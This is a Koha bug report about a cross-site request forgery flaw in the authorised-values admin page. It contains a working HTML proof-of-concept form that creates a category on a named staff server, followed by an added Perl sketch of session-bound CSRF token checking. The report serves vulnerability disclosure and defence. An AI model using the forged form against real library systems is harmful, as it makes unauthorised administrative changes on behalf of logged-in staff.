[Koha-bugs] [Bug 24409] admin/authorised_values.pl?op=add_form : Add New Category is vulnerable for CSRF attacks
bugzilla-daemon at bugs.koha-community.org
Mon Jan 13 13:59:25 CET 2020
https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=24409
--- Comment #1 from Aman Mishra <aman.mishra77 at gmail.com> ---
When we use this script, it allows creating a new category:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="http://library-staff.totalit.com/cgi-bin/koha/admin/authorised_values.pl"
method="POST">
<input type="hidden" name="category" value="AMAN8" />
<input type="hidden" name="op" value="add_category" />
<input type="hidden" name="id" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
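The form in the comment above succeeds because the `add_category` request carries nothing that a page on another origin cannot supply. The following Perl sketch of a session-bound token check for such an op is an added example, not part of the original comment and not Koha's code; the `csrf_token` field name, the helper names, the secret and the session id are all assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added illustration: session-bound CSRF token for a state-changing CGI op.
# Not Koha code; field name, helpers, secret and session id are constructed.
use strict;
use warnings;
use Digest::SHA qw(hmac_sha256_hex);

my $SECRET  = 'constructed-demo-secret';   # assumption: per-install server secret
my $MAX_AGE = 8 * 3600;                    # assumption: token lifetime in seconds

# Token = "<issued_at>:<HMAC(session_id|issued_at)>", rendered by the server
# as a hidden field in the form it serves to the logged-in user.
sub generate_csrf_token {
    my ($session_id, $now) = @_;
    $now //= time;
    return $now . ':' . hmac_sha256_hex("$session_id|$now", $SECRET);
}

# Compare two strings without stopping at the first differing character.
sub constant_time_eq {
    my ($x, $y) = @_;
    return 0 if length($x) != length($y);
    my $diff = 0;
    $diff |= ord(substr($x, $_, 1)) ^ ord(substr($y, $_, 1)) for 0 .. length($x) - 1;
    return $diff == 0;
}

sub check_csrf_token {
    my ($session_id, $token, $now) = @_;
    $now //= time;
    return 0 unless defined $token && $token =~ /\A(\d+):([0-9a-f]{64})\z/;
    my ($issued, $mac) = ($1, $2);
    return 0 if $issued > $now || $now - $issued > $MAX_AGE;   # future-dated or expired
    return constant_time_eq($mac, hmac_sha256_hex("$session_id|$issued", $SECRET));
}

# Handler gate: the state-changing op is honoured only on POST with a valid token.
sub may_perform_op {
    my ($method, $params, $session_id) = @_;
    return 1 unless ($params->{op} // '') eq 'add_category';   # only this op is gated here
    return 0 unless $method eq 'POST';
    return check_csrf_token($session_id, $params->{csrf_token});
}

my $sid    = 'constructed-session-id';
my %forged = (category => 'AMAN8', op => 'add_category', id => '');   # fields from the reported form
my %legit  = (%forged, csrf_token => generate_csrf_token($sid));
printf "cross-site form: %s\n", may_perform_op('POST', \%forged, $sid) ? 'accepted' : 'rejected';
printf "form with token: %s\n", may_perform_op('POST', \%legit,  $sid) ? 'accepted' : 'rejected';
```

Because the token is derived from the session id and a server-side secret, a form hosted on another site cannot include a valid value even though the browser attaches the victim's session cookie to the request.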